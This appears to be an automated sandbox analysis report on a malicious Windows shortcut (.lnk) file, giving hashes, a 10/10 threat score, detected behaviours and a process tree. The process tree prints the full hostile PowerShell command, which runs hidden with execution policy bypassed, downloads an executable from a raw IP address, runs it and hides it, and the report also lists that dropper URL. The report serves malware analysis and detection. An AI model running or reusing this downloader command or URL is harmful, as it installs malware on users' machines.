Analysis

  • max time kernel
    12s
  • max time network
    20s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    27-07-2024 09:38

General

  • Target

    1e2f9bb7d4aee809ae89704f6225503bf72b09ca897986ab70a00332fdf10ae7.lnk

  • Size

    2KB

  • MD5

    4db66f511c6604f1be1ae032b84f8358

  • SHA1

    8ab73293cf42ead05326874845622cea78822c8f

  • SHA256

    1e2f9bb7d4aee809ae89704f6225503bf72b09ca897986ab70a00332fdf10ae7

  • SHA512

    2cf294db093bbe00ce504d2817dced1d62d7eb8af4a7183836fb4af0288f7e5018cd2226bea522ad5464b911317bd184bb36303e766fa4a59239f87878510c67

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\1e2f9bb7d4aee809ae89704f6225503bf72b09ca897986ab70a00332fdf10ae7.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2160
    • C:\Windows\System32\WindowsPowerShell\v1.0\PoWersheLl.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\PoWersheLl.exe" -ExecutionPolicy -Bypass -WindowStyle hiDdEn -hiDdEn -Command PkgMgr.exe;(new-object System.Net.WebClient).DownloadFile('http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe','DisplayResolution.exe');./'DisplayResolution.exe';(get-item 'DisplayResolution.exe').Attributes += 'Hidden';
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2916

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2916-38-0x000007FEF531E000-0x000007FEF531F000-memory.dmp

    Filesize

    4KB

  • memory/2916-39-0x000000001B390000-0x000000001B672000-memory.dmp

    Filesize

    2.9MB

  • memory/2916-40-0x0000000001EA0000-0x0000000001EA8000-memory.dmp

    Filesize

    32KB

  • memory/2916-41-0x000007FEF5060000-0x000007FEF59FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2916-42-0x000007FEF5060000-0x000007FEF59FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2916-44-0x00000000025EB000-0x0000000002652000-memory.dmp

    Filesize

    412KB

  • memory/2916-43-0x000007FEF5060000-0x000007FEF59FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2916-45-0x000007FEF5060000-0x000007FEF59FD000-memory.dmp

    Filesize

    9.6MB